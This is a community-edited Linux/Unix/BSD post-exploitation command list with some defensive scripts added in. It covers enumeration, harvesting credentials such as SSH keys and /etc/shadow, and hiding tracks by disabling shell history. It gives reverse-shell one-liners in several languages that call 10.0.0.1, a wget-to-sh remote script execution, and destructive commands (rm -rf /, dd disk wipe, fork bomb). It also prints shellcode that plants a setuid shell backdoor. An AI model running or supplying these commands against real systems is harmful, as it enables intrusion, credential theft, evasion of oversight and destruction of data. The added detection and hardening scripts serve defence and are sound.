Linux/Unix/BSD Post-Exploitation

Command List

If for any reason you cannot access/edit these files in the future, please contact

mubix@hak5.org

You can download these files in any format using Google Docs' File->Download As method

If you are viewing this on anything other than Google Docs, you can get

access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and

Windows docs here: http://bit.ly/nuc0N0

DISCLAIMER: Anyone can edit these docs, and all that entails and implies


Table of Contents


Information

Blind Files

System

Networking

User accounts

Credentials

Configs

Determine Distro

Installed Packages

Package Sources

Finding Important Files

Covering Your Tracks

Avoiding history files

Obtain users’ information

Escalating

Looking for possible opened paths

Maintaining control

Reverse Shell

Fun if Windows is present and accessible

Stuff to be sorted

Deleting and Destroying

Execute a remote script

Fork Bomb


Information

Blind Files

Things to pull when all you can do is read blindly, e.g. through LFI or directory traversal (don't forget %00!)

File                      Contents and Reason
/etc/resolv.conf          Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd.
/etc/motd                 Message of the Day.
/etc/issue                Debian: current version of the distro.
/etc/passwd               List of local users.
/etc/shadow               List of users' password hashes (requires root).
/home/xxx/.bash_history   Gives you some directory context.
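The files in this table are exactly what a traversal or LFI request reaches for, so the defender's counterpart to this list is to flag such requests in the web server logs. The following is an added example, not part of the original list: a small filter for combined-format access logs that matches raw and URL-encoded "../", the %00 null byte, and direct requests for the files named above. The log lines are constructed for the stand-alone run and are not real traffic.

```bash
#!/bin/sh
# Added example (not from the original list): flag web requests that look
# like directory traversal / LFI aimed at the "blind files" listed above.
# Reads access-log lines on stdin and prints the suspicious ones.

flag_traversal() {
    # -i so that %2E%2E and %2e%2e both match; each alternative is one
    # indicator: raw "../", encoded "../", a %00 truncation byte, or a
    # direct reference to one of the files from the table.
    grep -iE '(\.\./|%2e%2e(%2f|/)|\.\.%2f|%00|/etc/(passwd|shadow|resolv\.conf|motd|issue)|\.bash_history)'
}

# Constructed sample log lines for a stand-alone run (not real traffic).
SAMPLE_LOG='10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/resolv.conf HTTP/1.1" 200 88
10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1460
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /images/logo.png HTTP/1.1" 200 4096
10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?page=/home/www/.bash_history HTTP/1.1" 404 230'

# Number of flagged lines in the sample (used by the stand-alone run).
count_traversal_hits() {
    printf '%s\n' "$SAMPLE_LOG" | flag_traversal | grep -c .
}

# Stand-alone run: print the flagged lines. On a real host:
#   flag_traversal < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_traversal
```

The filter is deliberately broad (it will also catch a legitimate page named "issue"), which is the right trade-off for a triage list that a human reads; a 200 response to a line containing /etc/ or %00 is the one worth chasing first.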

System

Command                   Description and/or Reason
uname -a                  Prints the kernel version, arch, sometimes distro, ...
ps aux                    List all running processes
top -b -n 1               One batch-mode snapshot of the process list (-n 1 = a single iteration)
id                        Your current username and groups
arch, uname -m            Kernel processor architecture
w                         Who is connected, uptime and load average
who -a                    Uptime, runlevel, ttys, processes etc.
gcc -v                    Returns the version of GCC.
mysql --version           Returns the version of MySQL.
perl -v                   Returns the version of Perl.
ruby -v                   Returns the version of Ruby.
python --version          Returns the version of Python.
java -version             Returns the version of Java.
df -k                     Mounted filesystems: size, % used, device and mount point
mount                     Mounted filesystems
last -a                   Last users logged on
lastcomm                  Last commands executed (needs process accounting enabled)
lastlog                   Most recent login of every user
lastlogin (BSD)           BSD equivalent of lastlog
getenforce                Get the status of SELinux (Enforcing, Permissive or Disabled)
dmesg                     Kernel messages since the last system boot
lspci                     Prints all PCI buses and devices
lsusb                     Prints all USB buses and devices
lscpu                     Prints CPU information
lshw                      Lists the hardware configuration
cat /proc/cpuinfo         CPU details
cat /proc/meminfo         Memory details
du -h --max-depth=1 /     Disk usage per top-level directory (note: can cause heavy disk I/O)
which nmap                Locate a command (i.e. nmap or nc)
locate bin/nmap
locate bin/nc
jps -l                    Lists running Java processes with their main class (JDK tool)

Networking

  1. hostname -f
  2. ip addr show
  3. ip ro show
  4. ifconfig -a
  5. route -n
  6. cat /etc/network/interfaces
  7. iptables -L -n -v
  8. iptables -t nat -L -n -v
  9. ip6tables -L -n -v
  10. iptables-save
  11. netstat -anop
  12. netstat -r
  13. netstat -nltupw (root with raw sockets)
  14. arp -a
  15. lsof -nPi

To summarize: cat /proc/net/* (more discreet)

What does that mean? All the information given by the commands above can also be found by reading the files under /proc/net, and reading files is less likely to trigger monitoring than running the networking tools.
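To see what /proc/net actually contains, the following is an added example, not part of the original list: a decoder for the /proc/net/tcp format that turns each row into the "local -> remote state" form netstat prints. Addresses in that file are little-endian hex (0100007F is 127.0.0.1), ports are hex, and the state column uses the kernel's TCP state numbers (01 ESTABLISHED, 0A LISTEN, ...). The sample rows at the bottom are constructed, not captured from a real host.

```bash
#!/bin/sh
# Added example (not from the original list): decode /proc/net/tcp rows into
# the form netstat shows. Input on stdin: the file's own header line followed
# by its rows. Works with any POSIX awk (no gawk-only strtonum).

decode_proc_net_tcp() {
    awk '
    # hex string -> number, e.g. "0CEA" -> 3306
    function hex2dec(h,    i, v) {
        v = 0; h = toupper(h)
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789ABCDEF", substr(h, i, 1)) - 1
        return v
    }
    # 8 hex digits, stored byte-reversed, -> dotted quad
    function hexip(h) {
        return hex2dec(substr(h, 7, 2)) "." hex2dec(substr(h, 5, 2)) "." hex2dec(substr(h, 3, 2)) "." hex2dec(substr(h, 1, 2))
    }
    # "ADDR:PORT" in hex -> "a.b.c.d:port"
    function endpoint(s,    a) { split(s, a, ":"); return hexip(a[1]) ":" hex2dec(a[2]) }
    BEGIN {
        st["01"] = "ESTABLISHED"; st["02"] = "SYN_SENT";   st["03"] = "SYN_RECV"
        st["04"] = "FIN_WAIT1";   st["05"] = "FIN_WAIT2";  st["06"] = "TIME_WAIT"
        st["07"] = "CLOSE";       st["08"] = "CLOSE_WAIT"; st["09"] = "LAST_ACK"
        st["0A"] = "LISTEN";      st["0B"] = "CLOSING"
    }
    # skip the header; $2 local, $3 remote, $4 state
    NR > 1 && NF >= 4 { print endpoint($2) " -> " endpoint($3) " " (($4 in st) ? st[$4] : $4) }
    '
}

# Constructed sample in the real file layout: a MySQL listener on localhost
# and an established connection from 10.0.2.2 to 10.0.0.1:1234.
SAMPLE_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0202000A:9C40 0100000A:04D2 01 00000000:00000000 00:00000000 00000000  1000        0 12346 1 0000000000000000 20 4 30 10 -1'

decode_sample() {
    printf '%s\n' "$SAMPLE_TCP" | decode_proc_net_tcp
}

# Stand-alone run on the sample. On a live host: decode_proc_net_tcp < /proc/net/tcp
decode_sample
```

The same decoder applies to /proc/net/udp and /proc/net/tcp6 (the latter with 32-digit addresses that need a longer hexip). Note for defenders that the inode in the last visible column is how a socket is tied back to a process: it is the number that appears in the process's /proc/PID/fd links as socket:[inode].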

User accounts

  1. local accounts: cat /etc/passwd
       a. password hashes in /etc/shadow on Linux
       b. password hashes in /etc/security/passwd on AIX
       c. groups in /etc/group (and/or /etc/gshadow on Linux)
  2. all accounts: getent passwd
       a. should dump local, LDAP, NIS, whatever the system is using
       b. same with getent group
  3. Samba's own database: pdbedit -L -w or pdbedit -L -v
  4. privileged accounts: cat ??? (command incomplete)
  5. mail aliases: cat /etc/aliases; find /etc -name aliases; getent aliases
  6. NIS accounts: ypcat passwd - displays the NIS password file

Credentials

  1. SSH keys, often passwordless: /home/*/.ssh/id*
  2. SSH agent:
  3. Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
  4. PGP keys: /home/*/.gnupg/secring.gpg

Configs

  1. ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' | grep -v lrwx  # world-writable entries in /etc, excluding symlinks
  2. cat /etc/issue{,.net}
  3. cat /etc/master.passwd
  4. cat /etc/group
  5. cat /etc/hosts
  6. cat /etc/crontab
  7. cat /etc/sysctl.conf
  8. for user in $(cut -f1 -d: /etc/passwd); do echo "$user"; crontab -u "$user" -l; done  # lists all crons
  9. cat /etc/resolv.conf
  10. cat /etc/syslog.conf
  11. cat /etc/chttp.conf
  12. cat /etc/lighttpd.conf
  13. cat /etc/cups/cupsd.conf
  14. cat /etc/inetd.conf
  15. cat /opt/lampp/etc/httpd.conf
  16. cat /etc/samba/smb.conf
  17. cat /etc/openldap/ldap.conf
  18. cat /etc/ldap/ldap.conf
  19. cat /etc/exports
  20. cat /etc/auto.master
  21. cat /etc/auto_master
  22. cat /etc/fstab
  23. find /etc/sysconfig/ -type f -exec cat {} \;

Determine Distro

  1. lsb_release -d                                    # Generic command for all LSB distros
  2. /etc/os-release                                   # Generic for distros using "systemd"
  3. /etc/issue                                        # Generic but often modified
  4. cat /etc/*release
  5. /etc/SUSE-release                                 # Novell SUSE
  6. /etc/redhat-release, /etc/redhat_version          # Red Hat
  7. /etc/fedora-release                               # Fedora
  8. /etc/slackware-release, /etc/slackware-version    # Slackware
  9. /etc/debian_release, /etc/debian_version          # Debian
  10. /etc/mandrake-release                            # Mandrake
  11. /etc/sun-release                                 # Sun JDS
  12. /etc/release                                     # Solaris/Sparc
  13. /etc/gentoo-release                              # Gentoo
  14. /etc/arch-release                                # Arch Linux (file will be empty)
  15. arch                                             # OpenBSD; sample: "OpenBSD.amd64"
  16. uname -a                                         # often hints at it pretty well

Installed Packages

  1. RPM-based:        rpm -qa --last | head
                       yum list | grep installed
  2. Debian:           dpkg -l
                       dpkg -l | grep -i "linux-image"
                       dpkg --get-selections
  3. {Free,Net}BSD:    pkg_info
  4. Solaris:          pkginfo
  5. Gentoo:                                            # equery must be installed
                       cd /var/db/pkg/ && ls -d */*     # always works
  6. Arch Linux:       pacman -Q

Package Sources

  1. Debian:      cat /etc/apt/sources.list
  2. yum-based:   ls -l /etc/yum.repos.d/
                  cat /etc/yum.conf

Finding Important Files

  1. ls -dlR */
  2. ls -alR | grep ^d
  3. find /var -type d
  4. ls -dl `find /var -type d`
  5. ls -dl `find /var -type d` | grep -v root
  6. find /var ! -user root -type d -ls
  7. find /var/log -type f -exec ls -la {} \;
  8. find / -perm -4000 (find all suid files)
  9. ls -alhtr /mnt
  10. ls -alhtr /media
  11. ls -alhtr /tmp
  12. ls -alhtr /home
  13. cd /home/; tree; ls /home/*/.ssh/*
  14. find /home -type f -iname '.*history'
  15. ls -lart /etc/rc.d/
  16. locate tar | grep [.]tar$  # Remember to updatedb before running locate
  17. locate tgz | grep [.]tgz$
  18. locate sql | grep [.]sql$
  19. locate settings | grep [.]php$
  20. locate config.inc | grep [.]php$
  21. ls /home/*/id*
  22. locate .properties | grep [.]properties$  # java config files
  23. locate .xml | grep [.]xml$  # java/.net config files
  24. find /sbin /usr/sbin /opt /lib $(echo "$PATH" | sed 's/:/ /g') -perm /6000 -ls  # find suid/sgid files
  25. locate rhosts
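The two suid searches above (items 8 and 24) are also the defender's most useful check, provided the result is kept and compared over time rather than looked at once. The following is an added example, not part of the original list: a baseline of setuid/setgid files plus a diff that prints "+ path" for newly planted ones and "- path" for ones that vanished. The root directory and baseline path are parameters; the test runs it against a constructed tree in a temporary directory.

```bash
#!/bin/sh
# Added example (not from the original list): baseline and diff of
# setuid/setgid files. Run save_suid_baseline once on a known-good host and
# diff_suid_baseline from cron; a newly planted setuid binary (a copied shell,
# for instance) shows up as a "+" line. ROOT defaults to /.
export LC_ALL=C                     # same collation for sort(1) and comm(1)

# Setuid or setgid regular files under $1 (default /), sorted, one per line.
list_suid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Record the current state of tree $1 into baseline file $2.
save_suid_baseline() {
    list_suid "$1" > "$2"
}

# Compare tree $1 with baseline $2. Prints "+ path" for new setuid/setgid
# files and "- path" for ones that disappeared; returns 1 if anything
# changed, 0 if the baseline still matches.
diff_suid_baseline() {
    tab=$(printf '\t')
    # comm -3: column 1 = only in baseline, column 2 (tab-indented) = only on disk
    changes=$(list_suid "$1" | comm -3 "$2" - | sed -e "s/^$tab/+ /" -e t -e "s/^/- /")
    [ -z "$changes" ] && return 0
    printf '%s\n' "$changes"
    return 1
}

# Usage on a real host (paths are assumptions, pick your own):
#   save_suid_baseline / /var/lib/suid.baseline
#   diff_suid_baseline / /var/lib/suid.baseline || logger -t suid-check "setuid set changed"
```

The baseline file itself must live somewhere the unprivileged users cannot write, or it will simply be updated along with the planted binary; a root-owned directory or an off-host copy is the usual answer.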

Covering Your Tracks

Avoiding history files

  1. export HISTFILE=
  2. unset HISTFILE

(either one works)

The next ones might not be a good idea: a lot of folks know to check for tampering with this file, and will be suspicious if they notice it.

However, if you happen to be on an account that was originally inaccessible and the .bash_history file is available (ls -a ~), viewing its contents can give you a good deal of information about the system and its most recent updates/changes.

Clear all history in RAM:

  1. history -c
  2. rm -rf ~/.bash_history && ln -s /dev/null ~/.bash_history (invasive)
  3. touch ~/.bash_history (invasive)
  4. <space> history -c (a leading space keeps a command out of history when HISTCONTROL contains ignorespace)
  5. zsh% unset HISTFILE HISTSIZE
  6. tcsh% set history=0
  7. bash$ set +o history
  8. ksh$ unset HISTFILE
  9. find / -type f -exec {} (forensics nightmare)

Note that you're probably better off modifying or temporarily disabling history files rather than deleting them: it leaves far fewer traces and is less suspicious.

In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9'ing the shell ($$). Sometimes the shell is configured to run 'history -w' after every command; get around this by overriding 'history' with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
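The last sentence above is the defender's side of this whole section, so here is what that configuration looks like. The following is an added example, not part of the original list: a bash profile fragment that makes the history variables read-only (defeats unset/export HISTFILE=), calls the builtin directly (defeats a no-op history function), and copies each command to syslog as it runs (so history -c and kill -9 $$ remove nothing that matters). It assumes bash, a syslog daemon that accepts logger(1) input, and that the file is installed as /etc/profile.d/history-audit.sh (an assumed path).

```bash
#!/bin/bash
# Added example (not from the original list): per-command syslog logging
# for interactive bash, the counter to the history-evasion tricks above.

# Turn one `history 1` entry ("   42  id") into the record sent to syslog.
audit_record() {
    user=$1; tty=$2; entry=$3
    cmd=$(printf '%s\n' "$entry" | sed 's/^ *[0-9]* *//')   # drop the history number
    printf 'user=%s tty=%s cmd=%s\n' "$user" "$tty" "$cmd"
}

harden_history() {
    HISTFILE=${HOME:-/tmp}/.bash_history
    HISTSIZE=10000
    HISTFILESIZE=10000
    HISTCONTROL=              # no ignorespace: a leading space no longer hides a command
    export HISTFILE HISTSIZE HISTFILESIZE HISTCONTROL
    # Once read-only, `unset HISTFILE`, `export HISTFILE=` and friends fail.
    readonly HISTFILE HISTSIZE HISTFILESIZE HISTCONTROL
    # Append on exit instead of overwriting (bash only).
    [ -n "$BASH_VERSION" ] && shopt -s histappend
    # After every command: flush to the file, then ship the last entry to
    # syslog. `builtin history` ignores any user-defined history() function,
    # and the variable itself is made read-only so it cannot be replaced.
    PROMPT_COMMAND='builtin history -a; logger -p auth.info -t bash-audit "$(audit_record "$USER" "$(tty)" "$(builtin history 1)")"'
    readonly PROMPT_COMMAND
}

# In /etc/profile.d this applies the settings to interactive logins only.
case $- in *i*) harden_history ;; esac
```

What it still does not cover: a user who runs set +o history, or who execs a different shell, leaves no further entries. That is why the syslog copy is a tripwire rather than a record; the dependable layer is execve logging by auditd (or an equivalent kernel-level facility), which does not depend on the shell's cooperation at all.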

Obtain users’ information

  1. ls -alh /home/*/
  2. ls -alh /home/*/.ssh/
  3. cat /home/*/.ssh/authorized_keys
  4. cat /home/*/.ssh/known_hosts
  5. cat /home/*/.*hist* # you can learn a lot from this
  6. find /home/*/.vnc /home/*/.subversion -type f
  7. grep ^ssh /home/*/.*hist*
  8. grep ^telnet /home/*/.*hist*
  9. grep ^mysql /home/*/.*hist*
  10. cat /home/*/.viminfo
  11. sudo -l # if sudoers is not readable, this sometimes works per user
  12. crontab -l
  13. cat /home/*/.mysql_history

Escalating

Looking for possible opened paths

  1. ls -alh /root/
  2. sudo -l
  3. cat /etc/sudoers
  4. cat /etc/shadow
  5. cat /etc/master.passwd # OpenBSD
  6. cat /var/spool/cron/crontabs/* /var/spool/cron/* 2>/dev/null
  7. lsof -nPi
  8. ls /home/*/.ssh/*

Maintaining control

Reverse Shell

Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

  1. bash -i >& /dev/tcp/10.0.0.1/8080 0>&1  (no /dev/tcp on older Debians; use nc, socat, TCL, awk or any interpreter such as Python instead)
  2. perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
  3. python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
  4. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  5. ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  6. nc -e /bin/sh 10.0.0.1 1234  # note: some versions need -l, and many no longer support -e
  7. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  8. xterm -display 10.0.0.1:1
       a. Listener: Xnest :1
       b. Add permission to connect: xhost +victimIP
  9. ssh -NR 3333:localhost:22 user@yourhost
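What most of the one-liners above have in common, and what a defender can look for, is a shell whose stdin/stdout/stderr have been redirected onto a network socket (dup2 in the Python and Perl versions, <&3 >&3 in PHP and Ruby, >& /dev/tcp in bash). The following is an added example, not part of the original list: a scanner over a /proc-style tree that reports every process whose fd 0, 1 or 2 is a socket, and a filter narrowing that to interactive shells. It assumes the Linux /proc layout (fd symlinks of the form socket:[inode] and a comm file per process); the test runs it against a constructed tree rather than the live /proc.

```bash
#!/bin/sh
# Added example (not from the original list): detect shells with their
# standard descriptors attached to a socket. Walks $1 (default /proc) and
# prints "pid comm fd target" for each fd 0/1/2 that is a socket. Reading
# other users' fd links requires root.

find_socket_stdio() {
    proc=${1:-/proc}
    for fd in "$proc"/[0-9]*/fd/0 "$proc"/[0-9]*/fd/1 "$proc"/[0-9]*/fd/2; do
        [ -L "$fd" ] || continue                    # unmatched glob or vanished pid
        target=$(readlink "$fd" 2>/dev/null) || continue
        case $target in
            socket:*)
                piddir=${fd%/fd/*}
                comm=$(cat "$piddir/comm" 2>/dev/null || echo '?')
                printf '%s %s %s %s\n' "${piddir##*/}" "$comm" "${fd##*/}" "$target"
                ;;
        esac
    done
}

# Narrow to the interactive shells the one-liners above actually spawn.
find_shell_on_socket() {
    find_socket_stdio "$1" | awk '$2 ~ /^(sh|bash|dash|zsh|ksh)$/'
}

# Stand-alone run against the live /proc (empty output is the normal case).
find_shell_on_socket
```

Two caveats from the list itself: the mkfifo/nc variant (item 7) keeps the shell on pipes and the socket on nc's fd 3, so it is not caught by this check and needs a rule of the form "nc/ncat/socat with an outbound socket plus a sibling sh on a pipe"; and the ssh -R variant (item 9) is plain sshd traffic, where the tell is the remote forward in sshd's own logs rather than anything in /proc. The socket:[inode] value printed here is the same inode that /proc/net/tcp lists, which is how the two views are joined.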

Fun if Windows is present and accessible

If Windows is installed and the logged-in user's access level covers its partitions, an attacker can mount them and do much deeper information gathering, credential theft and rooting. ntfs-3g is useful for mounting NTFS partitions read-write.

TODO: insert details on what to look for

Stuff to be sorted

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

Command                       Output
ps aux                        List of running processes
id                            Current user and group along with user/group id
w                             Shows who is logged in and what they are doing
who -a                        Print information about users
cat /dev/core > /dev/audio    Makes a sound from the memory content.
cat /dev/mem > /dev/audio     Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)
sudo -p                       Lets the user define what the password prompt will be (useful for fun customization with aliases or shell scripts)

Deleting and Destroying

(If it is necessary to leave the machine inaccessible or unusable)

Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble.

Oh, and you’re probably a jerk if you use any of the stuff below.

Command                              Description
rm -rf /                             This will recursively try to delete all files.

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ =
"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

                                     Circulated as the "hex version of rm -rf /". How is this supposed to work? Decoding the bytes answers it: \xb0\x0b\xcd\x80 is an execve syscall (int 0x80, eax=11), \x2f\x62\x69\x6e\x2f\x73\x68\x00\x2d\x63\x00 is "/bin/sh", "-c", and the string that follows is the argument, so what actually runs is /bin/sh -c "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;". It deletes nothing; it plants a setuid copy of the shell owned by whoever ran it (root, if run as root), i.e. a backdoor dressed up as a prank.

mkfs.ext3 /dev/sda                   Reformat the device mentioned, making recovery of files hard.
dd if=/dev/zero of=/dev/sda bs=1M    Overwrite disk /dev/sda with zeros

Execute a remote script

wget http://server/file.sh -O- | sh

This command downloads a file and immediately executes it; it combines easily with a reverse shell.

Fork Bomb

:(){:|:&};:

The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.


[a] Benito Camelo:

Just for Fun  - "apt-get install sl" (Distro debian based) then to any command create an alias of sl

[b] Sherwyn Williams:

Awesome list mubix I will review and try to add some stuff once the action dies down.


Rob Fuller:

Sweet!!

[c] Jay Taylor:

Is there a place for commands to issue as root vs. non-privileged user?


Rob Fuller:

Sort of, but you are welcome to make one / make it look better

[d] vavarachen:

How about adding ~/.mysql_history to the list?  Lot of juicy info in there, and sometimes even passwords in clear text.


Rob Fuller:

Awesome, add it!